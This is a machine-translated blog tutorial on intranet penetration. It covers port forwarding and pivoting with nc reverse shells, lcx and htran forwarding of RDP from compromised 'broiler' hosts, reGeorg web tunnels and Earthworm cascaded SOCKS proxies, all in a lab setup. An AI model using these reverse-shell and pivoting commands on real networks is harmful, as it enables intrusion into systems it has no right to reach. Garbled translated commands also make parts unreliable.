Hacking Book | Free Online Hacking Learning

Home

port forwarding, mapping and agent of intranet penetration

Posted by agaran at 2020-02-27
all

0x01 what is port forwarding

Port forwarding, sometimes called tunnel, is a method used by SSH for network security communication. Port forwarding is the behavior of forwarding a network port from one network node to another. It enables an external user to reach a port on a private internal IP address (internal LAN) through an activated NAT router.

Putonghua: port forwarding is to forward a port, which can be the port of the local machine or the port of any host that can be accessed by the local machine, to any IP that can be accessed, usually the IP is the public IP

0x02 what is port mapping

Port mapping is a kind of NAT. Its function is to translate the address in the public network into the private address. The ADSL broadband router with routing mode has a dynamic or fixed public IP. ADSL is directly connected to hub or switch, and all computers share the Internet.

Putonghua: the mapping port is to map an intranet port to a port on the public network. Suppose my own computer is in the intranet, and there is no public IP address, but I want to provide a port for others to use. This is the port mapping

0x03 differentiate between port mapping and port forwarding

Port mapping scenario:

External host a wants to access services on internal host B

Port forwarding scenario:

External host a can access any port on internal host B, but cannot access the port on internal host C

At this time, you can connect the port of the C host to the port of the B host. Then, when the external host a accesses the port of the B host, it is equivalent to accessing the port of the C host

Conclusion:

The principle of port forwarding and port mapping is the same, but the application scenarios are different. If we forward the local port to the remote host port, we can call it port mapping or port forwarding. See the figure below [note the text on the figure]

If we forward the port of any IP that can be accessed by this computer to the port of another server, we will ask other port to forward. See the figure below [note the text on the figure]

0x04 distinguish between forward connection and reverse connection

0x05 port forwarding and proxy tool

0x06 environment topology

A host W7

B host W7

C host XP

0x07 NC

NC usage

2. NC reverse connection network environment assumption:

A external network cannot access the internal network B [A is the attacker in the external network]

B. Intranet can access internet a

A:192.168.0.226

B:192.168.32.130

Suitable for NC reverse connection: it also bounces the shell of intranet host B to the outer network a

Execute on external host a: NC – nvlp 7777

Execute on intranet host B: NC – e CMD 192.168.0.226 7777

Here, pretend I connected to the shell and uploaded the NC

Echo at host a

3. NC forward connection network environment assumption:

A intranet can access external network B [A is the attacker in the intranet]

B external network can not access internal network a

Suitable for NC forward connection: it also bounces the shell of the intranet host a to the Internet host B

Execute NC – L – P 5555 – e cmd.exe on Intranet a

Execute NC – nvv 192.168.0.226 5555 on external host B

4.:

If the client [equivalent to internal network] connects to the server [equivalent to external network] and wants to obtain the server's shell, it is called forward shell. If the client connects to the server and the server wants to obtain the client's shell, it is called reverse shell

NC is a safe Swiss Army knife. It's so famous that it can not only rebound shell, forward port, chat, etc

0x08 LCX

LCX usage:

LCX port mapping environment assumption:

A external network cannot access the internal network B [A is the attacker in the external network]

B. Intranet can access internet a

Execute on intranet host B: lcx.exe – slave 192.168.0.226 7777 192.168.32.132 3389

This means that port 3389 of the intranet (192.168.32.132) is forwarded to port 7777 of the public network (192.168.0.226)

Execute on external host a: lcx.exe – listen 7777 5555

Listen to port 7777 on the host and transfer it to 5555

At this time, connecting remote desktop access 127.0.0.1:5555 on host a is equivalent to accessing 3389 of B

LCX port forwarding environment assumption:

A Internet access B

B Intranet can access C

A can't access C

A host IP: 192.168.0.226

Host B IP: 192.168.32.130

Host C IP: 192.168.32.135

Execute on intranet host B: lcx.exe – tran 7777 192.168.32.135 3389

It means: transfer port 3389 of host C to port 7777 of host B

At this time, accessing port 7777 on host B is equivalent to accessing port 3389 on host C

Running mstsc connection 192.168.32.130:7777 on host a or 127.0.0.1:7777 on host B can access 3389 of C

elaborate

LCX is mostly used for the empty computer (broiler) in the intranet. When the hacker wants to use the remote terminal for management, the hacker will generally turn on the broiler 3389, and then forward it through the LCX port

0x09 HTRAN

HTRAN usage

Htran usage - environmental scenario I

B public network

A can directly access B [and B has turned on 3389, firewall B forbids 3389 connection]

B can also visit a

A host IP: 192.168.0.226

Host B IP: 192.168.32.130

Host C IP: 192.168.32.135

Method 1:

Execute on host B: htran2.4.exe - P - tran 7777 127.0.0.1 3389

This means: convert 3389 of B to 7777 port of this computer

At this time, host a carries out remote desktop terminal connection: 192.168.32.130:7777

Method 2:

Monitor and execute on host a: htran2.4.exe - P - Listen 8888 9999

Listen to port 8888 of this computer and turn the traffic of port 8888 to 9999

Execute on host B: htran2.4.exe - P - slave 192.168.0.226 8888 127.0.0.1 3389

Forward port 3389 of this machine to port 8888 of a

Next, connect the 9999 port of remote desktop access local on host a to connect to 3389 port of B

Htran usage - environmental scenario II

Host B is on the public network

Intranet of C in B

A can access B, not c

A host IP: 192.168.0.226

Host B IP: 192.168.32.130

Host C IP: 192.168.32.135

Method 1:

Execute on host B: htran2.4.exe - P - tran 8888 192.168.32.135 3389

Forward port 3389 of host C to 8888 of host B

At this time, 8888 of a connection B is equivalent to 3389 of C

Method 2:

Monitor htran2.4.exe - P - listen 77779999 on host B

Listen to port 7777 of host B and forward the traffic to 9999

Execute on the C host: htran2.4.exe - P - slave 192.168.32.130 7777 127.0.0.1 3389

It means: transfer 3389 of C to port 7777 of B

0x01 what is agent

Proxy (English: proxy), also known as network proxy, is a special network service that allows one network terminal (generally the client) to make indirect connection with another network terminal (generally the server) through this service. Some network devices such as gateway and router have the function of network agent. It is generally believed that agent service is beneficial to protect the privacy or security of network terminals and prevent attacks

0x02 agent category

http proxy

SOCKS agent

FTP agent

Telnet agent

SSL agent

0x03 distinguish between forward agent and reverse agent

In the forward proxy, the proxy and the client belong to the same LAN and are transparent to the server; in the reverse proxy, the proxy and the server belong to the same LAN and are transparent to the client. One proxy is the client and one proxy is the server

Note: self painted, no criticism A kind of

0x04 regorg + proxychains agent

ReGeorg is the successor to reDuh. It mainly forwards the port of the intranet server to the local machine through the HTTP / HTTPS tunnel

Select the corresponding server script to upload to the server of host B, which is PHP

Access file shows Georg says, 'all seems fine', agent succeeded

Then execute the regorgsocksproxy.py file [urllib3 module required]: python2regorgsocksproxy.py – U "http://192.168.32.130/tunnel.php" – P 8888

The command line interface also displays all seems fine

Next, use the tool proxifier

Add a server first

Configure proxy rules

Select remote desktop program mstsc here

Connect to remote desktop

You can see the traffic through the agent

0x05 Socks4 / 5 agent based on PowerShell

Using invoke socksproxy, https://github.com/p3nt4/invoke socksproxy

Invoke socksproxy usage

Use method 1 of invoke socksproxy

Win10 host IP: 192.168.192.130

Win7 host IP: 192.168.192.129

Setting up a sock4 / 5 agent

First run PowerShell with administrator privileges on win10. If you are prompted that the script is forbidden to execute, enter "set executionpolicyremotesigned"

Enter Import-Module.Invoke-SocksProxy.psm1 to import the module

Enter invoke socksproxy - bindport 1234 to create a socks proxy on port 1234

Next, use socks agent software on win7 to access the Internet through port 1234 of win10

This time, I use sockscap. Of course, proxychains can do the same

Click the file to select "Settings" to set the SOCKS server IP and port, click the application to confirm

Click new to select the program that needs to pass the proxy. I choose Firefox here

Click Run, we visit Baidu

In the W10 host, the window can see that the connection has been successful

Use method 2 of invoke socksproxy

Add thread mode, input invoke socksproxy - bindport 1234 - threads 400

If - bindport is not added, the default port is 1080

0x06 Earthworm

EW is a set of portable network penetration tools, with two core functions of Socksv5 service setup and port forwarding, which can complete network penetration in complex network environment

Note: This tool has stopped updating and downloading

Earthworm usage

The following is a schematic diagram:

The tool can open a network tunnel in the way of "forward", "reverse", "multi-level cascade" to the depth of the network, break through the network limit with the unique means of earthworm, and loosen the soil for the firewall.

A variety of executable files are provided in the toolkit to adapt to different operating systems. Linux, windows, MacOS and arm linux are all included in the toolkit. More platform support is still in maintenance. Please wait.

usage method:

All the following examples, if there is no special description, the proxy port is 1080, and the service is Socksv5 proxy service

The tool has six command formats (ssocksd, rcsocks, rssocks, LCX? Slave, LCX? Listen, LCX? Tran).

\$ ./ew -s ssocksd -l 1080

This operation is divided into two steps:

a) First, run the following command on a host a with public IP:

\$ ./ew -s rcsocks -l 1080 -e 8888

b) Start socks V5 service on target host B and rebound to 8888 port of public host

\$ ./ew -s rssocks -d 1.1.1.1 -e 8888

Success.

There are three port forwarding instructions in the tool. Their parameter formats are as follows:

\$ ./ew -s lcx_listen -l 1080 -e 8888

\$ ./ew -s lcx_tran -l 1080 -f 2.2.2.3 -g 9999

\$ ./ew -s lcx_slave -d 1.1.1.1 -e 8888 -f 2.2.2.3 -g 9999

Through these port forwarding instructions, TCP based services in the deep layer of the network can be forwarded to the root, such as socks V5.

First, two local socks test samples of "two-level cascade" are provided:

a) The usage of LCX? Tran

\$ ./ew -s ssocksd -l 9999

\$ ./ew -s lcx_tran -l 1080 -f 127.0.0.1 -g 9999

b) Usage of LCX? Listen and LCX? Slave

\$ ./ew -s lcx_listen -l 1080 -e 8888

\$ ./ew -s ssocksd -l 9999

\$ ./ew -s lcx_slave -d 127.0.0.1 -e 8888 -f 127.0.0.1 -g 9999

Another "three-level cascade" local socks test case is provided for reference

\$ ./ew -s rcsocks -l 1080 -e 8888

\$ ./ew -s lcx_slave -d 127.0.0.1 -e 8888 -f 127.0.0.1 -g 9999

\$ ./ew -s lcx_listen -l 9999 -e 7777

\$ ./ew -s rssocks -d 127.0.0.1 -e 7777

Data flow direction: socks V5 - > 1080 - > 8888 - > 9999 - > 7777 - > rssocks

Note: the above content is from readme on the official website or in the tool

Earthworm usage method 1 [forward agent]

Win7 host IP: 192.168.192.1

Win7 host IP: 192.168.192.9

The target network boundary has public IP and can open any listening port:

+---------+ +-------------------+

|HackTools| ->> | 7777-> 192.168.192.9 |

+---------+ +-------------------+

Execute: EW for win 32.exe - s socksd - L 7777

On the W7 192.168.192.9 host, use this command to open the socks agent of port 7777

Next, you can use tools such as sockcap or proxychains to access the proxy port, because I won't use ink when I mentioned before, and I will directly put the screenshot of the demonstration

Note: This is a forward proxy. The proxy is the hacker client, and the connection is the broiler equivalent to the server

Earthworm usage method 2 [reverse proxy]

Win7 X32 host IP: 192.168.0.75 [hack machine]

Win7 host IP: 192.168.0.226 [public network machine]

Win7 host IP: 192.168.192.9 [intranet]

There is no public IP address at the target network boundary. You need to create a socks proxy by rebound

192.168.192.9 a controllable public IP host controllable internal host

+---------+ +--------------------------+ | +---------------+

|Hacktools - > 1089 - > 192.168.0.226 - > 9999 firewall \ < 192.168.0.75|

+---------+ +--------------------------+ | +---------------+

On the public network [VPS], execute: EW ﹣ for ﹣ win ﹣ 32.exe - s rcsocks - L 1089 - e 9999

Add a transfer tunnel to the public network host at 192.168.0.226, and transfer the proxy request received by 1089 to the host connecting port 9999 in reverse

Execute on the intranet host [controllable broiler]: EW ﹣ for ﹣ win ﹣ 32.exe - s rssocks - D 192.168.0.226 - e 9999

Reverse connect the controllable intranet host of the target network to the public network host

Next, you can use the Socks5 proxy service provided by the rssocks host by accessing the sockcap or proxychains port 192.168.0.226:1089

How to use earthworm III

Win7 host IP: 192.168.192.1 [hack machine]

Win7 host IP: 192.168.192.9 [a]

Win7 host IP: 192.168.192.11 [b]

Obtain the permissions of two hosts a and B in the target network, as described below:

Host a: there is a public IP address, and you can listen to any port freely, and you cannot access specific resources

Host B: internal host of the target network, which can access specific resources but cannot access the public network

Host a can directly connect to host B

Controllable boundary host a can access host B of specified resources

+---------+ +-----------------------+ +----------------

|HackTools| ->> | 1099 -->192.168.192.9 --> | ->> |7777 ->192.168.192.11 |

+---------+ +-----------------------+ +-----------------+

Execute on host B: EW for win 32.exe - s socksd - L 7777

Start the socks agent of port 7777 by using ssocksd mode on host B

Execute on host a: EW for win 32.exe - s LCX tran - L 1099 - F 192.168.192.11 - G 7777

/This means that the socks proxy request received by port 1080 is transferred to port 7777 of host B.

Next, you can use the Socks5 proxy service provided by the rssocks host by accessing the port 192.168.192.9:1099 of sockcap or proxychains

Screenshot of agent success:

How to use earthworm 4

Win7 host IP: 192.168.192.1 [hack machine]

Win7 host IP: 192.168.192.9 [a]

Win7 host IP: 192.168.192.10 [public network machine]

Win7 host IP: 192.168.192.13 [b]

Obtain the permissions of two hosts a and B in the target network, as described below:

Host a: the boundary host of the target network. It has no public IP address and cannot access specific resources.

Host B: the internal host of the target network, which can access specific resources but cannot connect back to the public network.

Host a can directly connect to host B

Add a transfer tunnel to the IP host on 192.168.192.10, and transfer the proxy request received by 1080 to the host connecting port 8888 in reverse

On the 192.168.192.13 [b] host, use the socksd mode to start the socks agent of port 9999

It means: on 192.168.192.9, the communication tunnel between 192.168.192.10:8888 and 192.168.192.13:9999 can be opened through LCX? Slave mode of the tool

Successful screenshot:

B

Public network

A

Hack machine

Note: normally in red, my agent B can't access the Internet

Summary of earthworm

At present, the tool provides six link states, which can be selected by the - S parameter, respectively:

ssocksd rcsocks rssocks

lcx_slave lcx_tran lcx_listen

The core logic support of Socks5 service is provided by socksd and rssocks, respectively corresponding to forward and reverse socks agents.

The rest of the LCX link states are used to open the path between the test host and the SOCKS server.

LCX category pipeline

LCX slave one side of the pipeline connects to the proxy requester through rebound mode, and the other side connects to the proxy to provide the host.

LCX? Tran: the pipeline receives the proxy request through listening to the local port and transfers it to the proxy to provide the host.

LCX listen this channel receives data through listening local port and transfers it to the agent connected back to the target network to provide host.

By combining the characteristics of LCX type pipeline, the penetration test in multi-layer Intranet environment can be realized.

Note: This is the summary that I wrote before. I revised the content and shared the pictures. Many tools such as FRP and ngrok were not summarized. If there is any problem, please don't spray me